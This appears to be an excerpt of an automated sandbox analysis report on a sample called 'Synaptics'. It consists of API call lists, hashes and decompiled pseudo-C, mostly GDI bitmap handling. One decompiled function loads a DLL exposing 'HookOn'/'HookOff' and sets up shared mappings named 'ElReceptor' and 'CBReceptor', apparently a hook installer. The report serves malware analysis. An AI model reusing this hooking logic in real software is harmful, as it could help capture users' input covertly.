                                                                                                                                                                                          • 73CCB410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000,?), ref: 0042983F
                                                                                                                                                                                          • 73CCB150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,004298BB,?,?,?,00000000), ref: 00429848
                                                                                                                                                                                          • SetBkColor.GDI32(?), ref: 00429852
                                                                                                                                                                                          • 73CD97E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,004298BB), ref: 00429876
                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00429880
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00429893
                                                                                                                                                                                          • DeleteObject.GDI32 ref: 0042989F
                                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 004298B5
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004298D0
                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004298EC
                                                                                                                                                                                          • 73CCB380.USER32(00000000,00000000,0042990A,00000001,00000000,?,00000000,00000000,00429903,?,?,00000054,?), ref: 004298FD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$Select$Delete$A590B150B410Color$A410B380
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2498167796-0
                                                                                                                                                                                          • Opcode ID: e75cc04e5f775ac63b903985b30141799dfca952e2a8f72f38a5fac3157433b3
                                                                                                                                                                                          • Instruction ID: d4ef2d2dc6560d6c5cd56807feb3c438281ae7d61b0b2818eaec840712012d23
                                                                                                                                                                                          • Opcode Fuzzy Hash: e75cc04e5f775ac63b903985b30141799dfca952e2a8f72f38a5fac3157433b3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 95516071F04218BBDB10EBE9DC45FAFB7FCAB09704F54446AB614F7281C678A9408B69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004764E4 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 144filelibraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E004764E4(void* __eax, void* __ebx, void __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				struct HINSTANCE__* _t30;
				intOrPtr _t46;
				intOrPtr _t70;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				void _t97;
				void* _t99;
				intOrPtr _t102;

				_push(0);
				_t97 = __ecx;
				_t74 = __edx;
				_t99 = __eax;
				_push(_t102);
				_push(0x476697);
				_push( *[fs:eax]);
				 *[fs:eax] = _t102;
				if(__edx == 0) {
					if( *((intOrPtr*)(__eax + 0x48)) != 0) {
						 *((intOrPtr*)(__eax + 0x48))();
					}
					_t30 =  *(_t99 + 0x40);
					if(_t30 != 0) {
						FreeLibrary(_t30);
					}
					if( *(_t99 + 0x30) != 0) {
						UnmapViewOfFile( *(_t99 + 0x38));
						UnmapViewOfFile( *(_t99 + 0x3c));
						CloseHandle( *(_t99 + 0x30));
						CloseHandle( *(_t99 + 0x34));
					}
				} else {
					_t82 =  *0x49ec58; // 0x22b4ac8
					E0047671C(__edx, _t82, __edx, __ecx, __eax);
					_t46 =  *0x49ec5c; // 0x0
					 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t46));
					if( *(_t99 + 0x40) == 0) {
						_t86 =  *0x49ec58; // 0x22b4ac8
						E00404CCC( &_v8, _t86, 0x4766ac);
						E0047671C(_t74, _v8, _t74, _t97, _t99);
						_t70 =  *0x49ec5c; // 0x0
						 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t70));
					}
					 *((intOrPtr*)(_t99 + 0x44)) = GetProcAddress( *(_t99 + 0x40), "HookOn");
					 *((intOrPtr*)(_t99 + 0x48)) = GetProcAddress( *(_t99 + 0x40), "HookOff");
					if( *((intOrPtr*)(_t99 + 0x44)) == 0 ||  *((intOrPtr*)(_t99 + 0x48)) == 0) {
						E0040D144(0x4766c8, 1);
						E00404378();
					}
					_t75 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "ElReceptor");
					 *(_t99 + 0x30) = _t75;
					if(_t75 == 0) {
						E0040D144(0x4766f8, 1);
						E00404378();
					}
					_t76 = MapViewOfFile( *(_t99 + 0x30), 2, 0, 0, 0);
					 *(_t99 + 0x38) = _t76;
					 *_t76 = _t97;
					_t77 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "CBReceptor");
					 *(_t99 + 0x34) = _t77;
					if(_t77 == 0) {
						E0040D144(0x4766f8, 1);
						E00404378();
					}
					_t78 = MapViewOfFile( *(_t99 + 0x34), 2, 0, 0, 0);
					 *(_t99 + 0x3c) = _t78;
					 *_t78 = _t97;
					 *((intOrPtr*)(_t99 + 0x44))();
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E0047669E);
				return E004049C0( &_v8);
			}


















                                                                                                                                                                                          0x004764e7
                                                                                                                                                                                          0x004764ec
                                                                                                                                                                                          0x004764ee
                                                                                                                                                                                          0x004764f0
                                                                                                                                                                                          0x004764f4
                                                                                                                                                                                          0x004764f5
                                                                                                                                                                                          0x004764fa
                                                                                                                                                                                          0x004764fd
                                                                                                                                                                                          0x00476502
                                                                                                                                                                                          0x00476645
                                                                                                                                                                                          0x00476647
                                                                                                                                                                                          0x00476647
                                                                                                                                                                                          0x0047664a
                                                                                                                                                                                          0x0047664f
                                                                                                                                                                                          0x00476652
                                                                                                                                                                                          0x00476652
                                                                                                                                                                                          0x0047665b
                                                                                                                                                                                          0x00476661
                                                                                                                                                                                          0x0047666a
                                                                                                                                                                                          0x00476673
                                                                                                                                                                                          0x0047667c
                                                                                                                                                                                          0x0047667c
                                                                                                                                                                                          0x00476508
                                                                                                                                                                                          0x00476508
                                                                                                                                                                                          0x00476512
                                                                                                                                                                                          0x00476517
                                                                                                                                                                                          0x00476527
                                                                                                                                                                                          0x0047652e
                                                                                                                                                                                          0x00476533
                                                                                                                                                                                          0x0047653e
                                                                                                                                                                                          0x0047654a
                                                                                                                                                                                          0x0047654f
                                                                                                                                                                                          0x0047655f
                                                                                                                                                                                          0x0047655f
                                                                                                                                                                                          0x00476570
                                                                                                                                                                                          0x00476581
                                                                                                                                                                                          0x00476588
                                                                                                                                                                                          0x0047659c
                                                                                                                                                                                          0x004765a1
                                                                                                                                                                                          0x004765a1
                                                                                                                                                                                          0x004765ba
                                                                                                                                                                                          0x004765bc
                                                                                                                                                                                          0x004765c1
                                                                                                                                                                                          0x004765cf
                                                                                                                                                                                          0x004765d4
                                                                                                                                                                                          0x004765d4
                                                                                                                                                                                          0x004765ea
                                                                                                                                                                                          0x004765ec
                                                                                                                                                                                          0x004765ef
                                                                                                                                                                                          0x00476605
                                                                                                                                                                                          0x00476607
                                                                                                                                                                                          0x0047660c
                                                                                                                                                                                          0x0047661a
                                                                                                                                                                                          0x0047661f
                                                                                                                                                                                          0x0047661f
                                                                                                                                                                                          0x00476635
                                                                                                                                                                                          0x00476637
                                                                                                                                                                                          0x0047663a
                                                                                                                                                                                          0x0047663c
                                                                                                                                                                                          0x0047663c
                                                                                                                                                                                          0x00476683
                                                                                                                                                                                          0x00476686
                                                                                                                                                                                          0x00476689
                                                                                                                                                                                          0x00476696

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476522
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 0047655A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,HookOn), ref: 0047656B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,HookOff), ref: 0047657C
                                                                                                                                                                                          • CreateFileMappingA.KERNEL32 ref: 004765B5
                                                                                                                                                                                          • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,ElReceptor,00000000,HookOff,00000000,00000000,00476697), ref: 004765E5
                                                                                                                                                                                          • CreateFileMappingA.KERNEL32 ref: 00476600
                                                                                                                                                                                          • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,CBReceptor,?,00000002,00000000,00000000,00000000), ref: 00476630
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476652
                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476661
                                                                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 0047666A
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476673
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,?,?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 0047667C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$View$Library$AddressCloseCreateHandleLoadMappingProcUnmap$Free
                                                                                                                                                                                          • String ID: CBReceptor$ElReceptor$HookOff$HookOn
                                                                                                                                                                                          • API String ID: 2408097603-676361416
                                                                                                                                                                                          • Opcode ID: a5f4899a086900954edb5c4e0a91e1a0a4881e9d12f7522f813d503661fad77f
                                                                                                                                                                                          • Instruction ID: bf3a7df91238c31d5b8269ba8868fe670cbdf993f40fb106005159f73c36cbb0
                                                                                                                                                                                          • Opcode Fuzzy Hash: a5f4899a086900954edb5c4e0a91e1a0a4881e9d12f7522f813d503661fad77f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 534163B0700B00ABD730BBB6DD86B5677E5AB44708F91453FF649AB6D1CA79B8048B0C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0042A510 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E0042A510(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E0040275C(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x42aa2d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x42aa00);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00403BBC(1);
						if(_a4 == 0) {
							E004032B4( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E0041D93C(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t251 = _v64;
					E004032B4(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E00425F40();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E0041D8CC(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E004261D0( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E0041D8CC(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E004261F0( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E00426498(_v32);
				}
				_push(0);
				L00407638();
				_v16 = E00426060(_t160);
				_push(_t323);
				_push(0x42a97b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x49b620 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L004072E8();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040E79C(_t245, _t257, _t317, _t321);
							} else {
								E00425F40();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E0041D8CC(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x42a94a;
						 *[fs:eax] = _t290;
						_push(0x42a982);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L00407888();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E0040275C(_t321);
					_push(_t323);
					_push(0x42a8e3);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E0041D8CC(_v12, _t321, _v24);
					_push(_v16);
					L004072E0();
					_v20 = E00426060(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L004072D8();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E00426750(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L00407440();
						_v56 = _t204;
						_push(_v20);
						L00407418();
					}
					_push(_t323);
					_push(0x42a8b7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L004072F0();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040E79C(_t245, _t263, _t317, _t321);
						} else {
							E00425F40();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(0x42a8be);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L00407440();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}




















































                                                                                                                                                                                          0x0042a510
                                                                                                                                                                                          0x0042a511
                                                                                                                                                                                          0x0042a513
                                                                                                                                                                                          0x0042a51c
                                                                                                                                                                                          0x0042a51e
                                                                                                                                                                                          0x0042a521
                                                                                                                                                                                          0x0042a526
                                                                                                                                                                                          0x0042a52b
                                                                                                                                                                                          0x0042a530
                                                                                                                                                                                          0x0042a540
                                                                                                                                                                                          0x0042a547
                                                                                                                                                                                          0x0042a54f
                                                                                                                                                                                          0x0042a551
                                                                                                                                                                                          0x0042a551
                                                                                                                                                                                          0x0042a568
                                                                                                                                                                                          0x0042a56e
                                                                                                                                                                                          0x0042a573
                                                                                                                                                                                          0x0042a574
                                                                                                                                                                                          0x0042a579
                                                                                                                                                                                          0x0042a57c
                                                                                                                                                                                          0x0042a581
                                                                                                                                                                                          0x0042a582
                                                                                                                                                                                          0x0042a587
                                                                                                                                                                                          0x0042a58a
                                                                                                                                                                                          0x0042a591
                                                                                                                                                                                          0x0042a5f0
                                                                                                                                                                                          0x0042a5f3
                                                                                                                                                                                          0x0042a5f9
                                                                                                                                                                                          0x0042a5ff
                                                                                                                                                                                          0x0042a619
                                                                                                                                                                                          0x0042a620
                                                                                                                                                                                          0x0042a62f
                                                                                                                                                                                          0x0042a634
                                                                                                                                                                                          0x0042a642
                                                                                                                                                                                          0x0042a64e
                                                                                                                                                                                          0x0042a64e
                                                                                                                                                                                          0x0042a65e
                                                                                                                                                                                          0x0042a66e
                                                                                                                                                                                          0x0042a682
                                                                                                                                                                                          0x0042a691
                                                                                                                                                                                          0x0042a6a3
                                                                                                                                                                                          0x0042a6a9
                                                                                                                                                                                          0x0042a6a9
                                                                                                                                                                                          0x0042a593
                                                                                                                                                                                          0x0042a5a3
                                                                                                                                                                                          0x0042a5a6
                                                                                                                                                                                          0x0042a5b2
                                                                                                                                                                                          0x0042a5b7
                                                                                                                                                                                          0x0042a5bd
                                                                                                                                                                                          0x0042a5c4
                                                                                                                                                                                          0x0042a5cb
                                                                                                                                                                                          0x0042a5d3
                                                                                                                                                                                          0x0042a5d7
                                                                                                                                                                                          0x0042a5d7
                                                                                                                                                                                          0x0042a6ac
                                                                                                                                                                                          0x0042a6b2
                                                                                                                                                                                          0x0042a6ba
                                                                                                                                                                                          0x0042a6c2
                                                                                                                                                                                          0x0042a6c4
                                                                                                                                                                                          0x0042a6c4
                                                                                                                                                                                          0x0042a6cd
                                                                                                                                                                                          0x0042a6cf
                                                                                                                                                                                          0x0042a6d7
                                                                                                                                                                                          0x0042a6e3
                                                                                                                                                                                          0x0042a6f0
                                                                                                                                                                                          0x0042a6f5
                                                                                                                                                                                          0x0042a6f9
                                                                                                                                                                                          0x0042a6f9
                                                                                                                                                                                          0x0042a6e3
                                                                                                                                                                                          0x0042a6d7
                                                                                                                                                                                          0x0042a700
                                                                                                                                                                                          0x0042a70b
                                                                                                                                                                                          0x0042a70b
                                                                                                                                                                                          0x0042a711
                                                                                                                                                                                          0x0042a71d
                                                                                                                                                                                          0x0042a726
                                                                                                                                                                                          0x0042a738
                                                                                                                                                                                          0x0042a73e
                                                                                                                                                                                          0x0042a740
                                                                                                                                                                                          0x0042a74c
                                                                                                                                                                                          0x0042a756
                                                                                                                                                                                          0x0042a75b
                                                                                                                                                                                          0x0042a75e
                                                                                                                                                                                          0x0042a75e
                                                                                                                                                                                          0x0042a761
                                                                                                                                                                                          0x0042a766
                                                                                                                                                                                          0x0042a768
                                                                                                                                                                                          0x0042a768
                                                                                                                                                                                          0x0042a76e
                                                                                                                                                                                          0x0042a773
                                                                                                                                                                                          0x0042a773
                                                                                                                                                                                          0x0042a778
                                                                                                                                                                                          0x0042a77a
                                                                                                                                                                                          0x0042a784
                                                                                                                                                                                          0x0042a789
                                                                                                                                                                                          0x0042a78a
                                                                                                                                                                                          0x0042a78f
                                                                                                                                                                                          0x0042a792
                                                                                                                                                                                          0x0042a798
                                                                                                                                                                                          0x0042a79d
                                                                                                                                                                                          0x0042a7ab
                                                                                                                                                                                          0x0042a8ea
                                                                                                                                                                                          0x0042a8ec
                                                                                                                                                                                          0x0042a8f1
                                                                                                                                                                                          0x0042a8f2
                                                                                                                                                                                          0x0042a8f7
                                                                                                                                                                                          0x0042a8f8
                                                                                                                                                                                          0x0042a8fb
                                                                                                                                                                                          0x0042a8fc
                                                                                                                                                                                          0x0042a901
                                                                                                                                                                                          0x0042a908
                                                                                                                                                                                          0x0042a917
                                                                                                                                                                                          0x0042a920
                                                                                                                                                                                          0x0042a919
                                                                                                                                                                                          0x0042a919
                                                                                                                                                                                          0x0042a919
                                                                                                                                                                                          0x0042a917
                                                                                                                                                                                          0x0042a927
                                                                                                                                                                                          0x0042a92d
                                                                                                                                                                                          0x0042a930
                                                                                                                                                                                          0x0042a93b
                                                                                                                                                                                          0x0042a942
                                                                                                                                                                                          0x0042a945
                                                                                                                                                                                          0x0042a964
                                                                                                                                                                                          0x0042a967
                                                                                                                                                                                          0x0042a96a
                                                                                                                                                                                          0x0042a96f
                                                                                                                                                                                          0x0042a972
                                                                                                                                                                                          0x0042a973
                                                                                                                                                                                          0x0042a975
                                                                                                                                                                                          0x0042a97a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0042a7b1
                                                                                                                                                                                          0x0042a7b1
                                                                                                                                                                                          0x0042a7b3
                                                                                                                                                                                          0x0042a7bd
                                                                                                                                                                                          0x0042a7c2
                                                                                                                                                                                          0x0042a7c3
                                                                                                                                                                                          0x0042a7c8
                                                                                                                                                                                          0x0042a7cb
                                                                                                                                                                                          0x0042a7d1
                                                                                                                                                                                          0x0042a7d6
                                                                                                                                                                                          0x0042a7de
                                                                                                                                                                                          0x0042a7df
                                                                                                                                                                                          0x0042a7e9
                                                                                                                                                                                          0x0042a7ec
                                                                                                                                                                                          0x0042a7ee
                                                                                                                                                                                          0x0042a7f0
                                                                                                                                                                                          0x0042a7f3
                                                                                                                                                                                          0x0042a7f4
                                                                                                                                                                                          0x0042a803
                                                                                                                                                                                          0x0042a808
                                                                                                                                                                                          0x0042a80e
                                                                                                                                                                                          0x0042a813
                                                                                                                                                                                          0x0042a815
                                                                                                                                                                                          0x0042a821
                                                                                                                                                                                          0x0042a824
                                                                                                                                                                                          0x0042a829
                                                                                                                                                                                          0x0042a82a
                                                                                                                                                                                          0x0042a82d
                                                                                                                                                                                          0x0042a82e
                                                                                                                                                                                          0x0042a833
                                                                                                                                                                                          0x0042a839
                                                                                                                                                                                          0x0042a83a
                                                                                                                                                                                          0x0042a83a
                                                                                                                                                                                          0x0042a841
                                                                                                                                                                                          0x0042a842
                                                                                                                                                                                          0x0042a847
                                                                                                                                                                                          0x0042a84a
                                                                                                                                                                                          0x0042a84d
                                                                                                                                                                                          0x0042a84f
                                                                                                                                                                                          0x0042a852
                                                                                                                                                                                          0x0042a856
                                                                                                                                                                                          0x0042a857
                                                                                                                                                                                          0x0042a859
                                                                                                                                                                                          0x0042a85a
                                                                                                                                                                                          0x0042a85d
                                                                                                                                                                                          0x0042a85e
                                                                                                                                                                                          0x0042a863
                                                                                                                                                                                          0x0042a86a
                                                                                                                                                                                          0x0042a873
                                                                                                                                                                                          0x0042a87c
                                                                                                                                                                                          0x0042a875
                                                                                                                                                                                          0x0042a875
                                                                                                                                                                                          0x0042a875
                                                                                                                                                                                          0x0042a873
                                                                                                                                                                                          0x0042a883
                                                                                                                                                                                          0x0042a886
                                                                                                                                                                                          0x0042a889
                                                                                                                                                                                          0x0042a892
                                                                                                                                                                                          0x0042a894
                                                                                                                                                                                          0x0042a899
                                                                                                                                                                                          0x0042a89d
                                                                                                                                                                                          0x0042a89e
                                                                                                                                                                                          0x0042a89e
                                                                                                                                                                                          0x0042a8b6
                                                                                                                                                                                          0x0042a8b6

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • 73CCAC50.USER32(00000000,?,00000000,0042AA2D,?,?), ref: 0042A77A
                                                                                                                                                                                          • 73CCA590.GDI32(00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7DF
                                                                                                                                                                                          • 73CCA520.GDI32(00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000,?,00000000,0042AA2D,?,?), ref: 0042A7F4
                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0042A7FE
                                                                                                                                                                                          • 73CCB410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B,?,00000000), ref: 0042A82E
                                                                                                                                                                                          • 73CCB150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,0042A8E3,?,00000000,0042A97B), ref: 0042A83A
                                                                                                                                                                                          • 73CCA7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A85E
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A86C
                                                                                                                                                                                          • 73CCB410.GDI32(?,00000000,000000FF,0042A8BE,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001), ref: 0042A89E
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0042A8AB
                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0042A8B1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                                                                                                                                                                          • String ID: ($BM
                                                                                                                                                                                          • API String ID: 3415089252-2980357723
                                                                                                                                                                                          • Opcode ID: 2a3d87137b30854e2cc8dc58c18fbf8192ff982d77d5cdf853aead562bb2ee10
                                                                                                                                                                                          • Instruction ID: 25b6b903fc63a4d1ab3304e11741f41bc99333438c5c48279b365a0d6610163c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a3d87137b30854e2cc8dc58c18fbf8192ff982d77d5cdf853aead562bb2ee10
                                                                                                                                                                                          • Instruction Fuzzy Hash: A8D14C74F002189FDB04EFA9D885BAEBBB5FF48304F54846AE904E7391D7389851CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

